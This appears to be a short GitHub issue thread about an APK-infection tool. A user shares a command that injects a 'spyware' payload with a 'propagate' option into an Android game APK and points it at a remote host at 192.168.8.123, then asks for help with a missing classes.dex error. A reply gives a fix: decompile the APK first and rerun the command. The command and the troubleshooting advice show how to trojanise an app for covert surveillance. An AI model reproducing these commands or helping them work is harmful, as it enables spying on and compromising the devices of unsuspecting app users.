You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
i used this command
python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123
and it give the following error
FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'
can you help me please
The text was updated successfully, but these errors were encountered:
i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'
can you help me please
Try Decompiling the flappy.apk first then run your command again like this
python3 sci.py -a /root/Desktop/flappy payload spyware -ppg propagate -rh 192.168.8.123
i used this command
python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123
and it give the following error
FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'
can you help me please
The text was updated successfully, but these errors were encountered: